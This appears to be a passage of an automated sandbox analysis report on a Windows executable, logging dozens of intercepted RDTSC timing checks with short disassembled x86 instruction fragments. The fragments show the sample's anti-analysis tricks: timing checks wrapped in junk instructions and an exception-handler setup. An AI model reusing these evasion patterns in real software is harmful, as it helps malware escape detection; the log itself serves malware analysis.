Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C98F2 second address: 9C98F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C98F6 second address: 9C98FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C98FA second address: 9C99C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F73F90B68E8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push edi 0x00000025 pushad 0x00000026 sub eax, dword ptr [ebp+122D2915h] 0x0000002c mov eax, ecx 0x0000002e popad 0x0000002f pop edi 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov dword ptr [ebp+122D3407h], esi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 mov cx, bx 0x00000047 sub dword ptr [ebp+122D1801h], esi 0x0000004d mov dword ptr [ebp+12480610h], esp 0x00000053 push ecx 0x00000054 call 00007F73F90B68F0h 0x00000059 jmp 00007F73F90B68EBh 0x0000005e pop edi 0x0000005f pop edx 0x00000060 cmp dword ptr [ebp+122D2C3Dh], 00000000h 0x00000067 jne 00007F73F90B69BEh 0x0000006d jmp 00007F73F90B68F0h 0x00000072 mov byte ptr [ebp+122D1962h], 00000047h 0x00000079 and di, 4B67h 0x0000007e mov eax, D49AA7D2h 0x00000083 mov edi, dword ptr [ebp+122D344Ah] 0x00000089 mov cx, dx 0x0000008c nop 0x0000008d push eax 0x0000008e push edx 0x0000008f jnc 00007F73F90B68FBh 0x00000095 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9C2A second address: 9C9C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9D74 second address: 9C9DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pushad 0x0000000a jnp 00007F73F90B68ECh 0x00000010 jne 00007F73F90B68ECh 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jno 00007F73F90B68E6h 0x00000024 jnc 00007F73F90B68E6h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9DAB second address: 9C9DB5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73F910AA5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9DB5 second address: 9C9DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9F44 second address: 9C9F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F73F910AA56h 0x0000000a popad 0x0000000b jmp 00007F73F910AA65h 0x00000010 popad 0x00000011 mov dword ptr [esp], esi 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F73F910AA58h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1810h], eax 0x00000034 nop 0x00000035 pushad 0x00000036 pushad 0x00000037 je 00007F73F910AA56h 0x0000003d push edi 0x0000003e pop edi 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 push edi 0x00000043 pop edi 0x00000044 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CA65E second address: 9CA69A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68F0h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push edx 0x0000000f mov dh, ah 0x00000011 pop edx 0x00000012 push 0000001Eh 0x00000014 sbb dx, 3483h 0x00000019 jmp 00007F73F90B68EFh 0x0000001e nop 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CA93A second address: 9CA951 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F73F910AA5Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CAA42 second address: 9CAA46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CAA46 second address: 9CAA4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CAA4A second address: 9CAA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dx, bx 0x0000000d lea eax, dword ptr [ebp+124805B8h] 0x00000013 sbb dl, FFFFFFA4h 0x00000016 nop 0x00000017 jng 00007F73F90B68F0h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0915F second address: A09167 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A09417 second address: A09421 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73F90B68E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A09421 second address: A09427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A09427 second address: A0942C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0980D second address: A09821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F910AA5Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A09821 second address: A09832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 jbe 00007F73F90B68E6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A099B2 second address: A099C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F73F910AA5Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A0D43E second address: A0D493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68EFh 0x00000009 pop edi 0x0000000a pushad 0x0000000b jl 00007F73F90B68E6h 0x00000011 je 00007F73F90B68E6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a jns 00007F73F90B68F4h 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 jmp 00007F73F90B68F8h 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12F97 second address: A12F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12F9B second address: A12F9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12F9F second address: A12FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F73F910AA67h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12FBC second address: A12FD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68EEh 0x00000007 jc 00007F73F90B68F2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12FD4 second address: A12FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 990AA2 second address: 990ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jnl 00007F73F90B68F2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A11C41 second address: A11C47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A11C47 second address: A11C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 990AB3 second address: 990ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F73F910AA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A11EE9 second address: A11F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68EFh 0x00000009 popad 0x0000000a jmp 00007F73F90B68F6h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 jc 00007F73F90B68E6h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A121E5 second address: A121F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A121F0 second address: A121F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12345 second address: A12349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12349 second address: A12368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 js 00007F73F90B68E6h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F73F90B68EEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A12368 second address: A1236E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1262B second address: A12653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73F90B68F3h 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c pushad 0x0000000d jc 00007F73F90B68E6h 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A128D3 second address: A128DD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73F910AA6Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A169D6 second address: A169E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F73F90B68ECh 0x0000000a jnl 00007F73F90B68E6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A169E6 second address: A169F1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A169F1 second address: A169F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A169F7 second address: A16A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A18FEF second address: A1900C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F73F90B68F0h 0x0000000b jl 00007F73F90B68E6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E53A second address: A1E547 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F73F910AA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E547 second address: A1E54F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E54F second address: A1E559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E559 second address: A1E55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E6CF second address: A1E6D4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1E850 second address: A1E854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1ECA9 second address: A1ECD5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F73F910AA5Ch 0x00000008 jno 00007F73F910AA56h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F73F910AA5Ch 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jo 00007F73F910AA6Ah 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1ECD5 second address: A1ECD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A1ECD9 second address: A1ECDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2218E second address: A22192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2196D second address: A21972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A21B0F second address: A21B29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F73F90B68E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F73F90B68F2h 0x00000012 js 00007F73F90B68E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A27FEF second address: A2801A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F73F910AA5Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 js 00007F73F910AA56h 0x00000016 jmp 00007F73F910AA5Ch 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2801A second address: A28046 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F73F90B68EFh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F73F90B68EEh 0x00000011 jc 00007F73F90B68ECh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 981703 second address: 98170B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 98170B second address: 981712 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26961 second address: A2697D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73F910AA56h 0x00000008 jne 00007F73F910AA56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jng 00007F73F910AA56h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2697D second address: A2699B instructions: 0x00000000 rdtsc 0x00000002 je 00007F73F90B68E6h 0x00000008 jmp 00007F73F90B68F0h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26B11 second address: A26B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26F33 second address: A26F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 jg 00007F73F90B68E6h 0x0000000c jmp 00007F73F90B68F4h 0x00000011 pop eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push edi 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26F5B second address: A26F79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnp 00007F73F910AA63h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F73F910AA5Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26F79 second address: A26F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26F7D second address: A26F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A26F87 second address: A26F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CA4B6 second address: 9CA4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CA4BA second address: 9CA4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jl 00007F73F90B68EEh 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9CA58F second address: 9CA594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A270F3 second address: A270FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F73F90B68E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: 9C9D86 second address: 9C9DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F73F910AA5Ch 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jno 00007F73F910AA56h 0x00000018 jnc 00007F73F910AA56h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2F83A second address: A2F85F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73F90B68F2h 0x00000007 jmp 00007F73F90B68EFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2F85F second address: A2F869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F73F910AA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2F869 second address: A2F86D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2DB89 second address: A2DB8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2E447 second address: A2E453 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73F90B68E6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2E453 second address: A2E458 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2ED2C second address: A2ED36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2ED36 second address: A2ED3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2F2CA second address: A2F2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F73F90B68F3h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F73F90B68E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A2F2EC second address: A2F2F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A38029 second address: A38034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WwVs3PavPg.exe	RDTSC instruction interceptor: First address: A3845B second address: A38470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F73F910AA56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F73F910AA56h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
